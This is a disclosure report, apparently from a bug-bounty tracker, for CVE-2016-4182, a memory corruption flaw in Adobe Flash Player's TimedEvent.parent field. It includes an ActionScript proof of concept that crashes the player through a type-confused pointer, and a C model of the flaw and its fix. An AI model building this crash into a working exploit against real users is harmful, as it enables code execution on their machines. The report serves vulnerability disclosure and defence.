Adobe Flash Player TimedEvent.parent Memory Corruption Vulnerability
Vulnerability Details
I. Summary
Adobe Flash Player is prone to a memory corruption vulnerability caused by the uninitialized memory of the TimedEvent.parent field.
------------------------------------------------------------------
II. Description
Normally, the TimedEvent class should initialize the memory of its parent field. Without proper initialization, one could control the memory address held in the parent field by constructing the TimedEvent object on top of a released memory block. It is then possible to fake a TimedEvent class object via the parent field, and the type-confused class pointer will lead to code execution.
The PoC code triggers the crash while trying to build a TimedEvent class object by calling the constructor at 0x13371337.
POC Source Code:
package
{
    import com.adobe.tvsdk.mediacore.events.TimedEvent;
    import com.adobe.tvsdk.mediacore.metadata.Metadata;
    import flash.display.Sprite;
    import flash.utils.ByteArray;
    import flash.utils.Endian;

    public class poc extends Sprite
    {
        public function poc()
        {
            // Fill a 0x100-byte block with the marker value 0x13371337.
            var bytes:ByteArray = new ByteArray();
            bytes.endian = Endian.LITTLE_ENDIAN;
            for (var i:int = 0; i < 0x100 / 4; i++)
                bytes.writeUnsignedInt(0x13371337);

            // Hand the block to a Metadata object.
            var mt:Metadata = new Metadata();
            mt.setByteArray("jack", bytes);

            // Construct a TimedEvent and read its uninitialized parent field;
            // the crash occurs when 0x13371337 is used as the class pointer.
            var obj:TimedEvent = new TimedEvent(0);
            obj.parent;
        }
    }
}
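The mechanism described above, as an added illustration that is not Flash Player's code and not part of the original report: a hypothetical pool allocator that recycles a freed slot without wiping it, a hypothetical TimedEvent layout reduced to the parent field, and the constructor with and without the missing initialization.

```c
#include <stdint.h>
#include <stddef.h>

/* Hypothetical model (not Flash Player code): a one-slot pool that hands
 * back the most recently released block without clearing it, the way a
 * recycled heap block keeps the contents its previous owner left behind. */
#define SLOT_SIZE 0x100
static uint8_t pool[SLOT_SIZE];
static int pool_free = 1;

static void *pool_alloc(void) { if (!pool_free) return NULL; pool_free = 0; return pool; }
static void pool_release(void *p) { (void)p; pool_free = 1; } /* no wipe on release */

/* Hypothetical TimedEvent layout: only the field the report discusses,
 * modeled as a 32-bit pointer value. */
typedef struct { uint32_t parent; } timed_event_t;

/* Vulnerable constructor: allocates the object but never sets parent,
 * so parent holds whatever the recycled block contained. */
static timed_event_t *timed_event_new_vuln(void) {
    return (timed_event_t *)pool_alloc();
}

/* Fixed constructor: every field receives a defined value before use. */
static timed_event_t *timed_event_new_fixed(void) {
    timed_event_t *ev = (timed_event_t *)pool_alloc();
    if (ev) ev->parent = 0;
    return ev;
}

/* Replays the report's sequence: a 0x100-byte block is filled with
 * 0x13371337 and released, then a TimedEvent is built on top of it.
 * Returns the value found in parent (0x13371337 when the constructor
 * leaves the field uninitialized, 0 with the fix). */
static uint32_t parent_after_reuse(int use_fix) {
    uint32_t *bytes = (uint32_t *)pool_alloc();
    if (!bytes) return 0xFFFFFFFFu;               /* pool busy: sentinel */
    for (size_t i = 0; i < SLOT_SIZE / sizeof(uint32_t); i++)
        bytes[i] = 0x13371337u;                   /* constructed marker value */
    pool_release(bytes);
    timed_event_t *ev = use_fix ? timed_event_new_fixed() : timed_event_new_vuln();
    uint32_t parent = ev->parent;
    pool_release(ev);
    return parent;
}
```

The same pattern is what an audit of a constructor should look for: any pointer-typed field that reaches a use before a store, since a recycled block makes its previous contents the effective initial value.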
------------------------------------------------------------------
III. Impact
Memory Corruption
------------------------------------------------------------------
IV. Affected
Adobe Flash Player 21.0.0.242.
------------------------------------------------------------------
V. Credit
Wen Guanxing from Pangu LAB is credited for this vulnerability.
It has been assigned as CVE-2016-4182 by Adobe:
https://helpx.adobe.com/security/products/flash-player/apsb16-25.html
Report Stats
- Report ID: 151039
- State: Closed
- Substate: resolved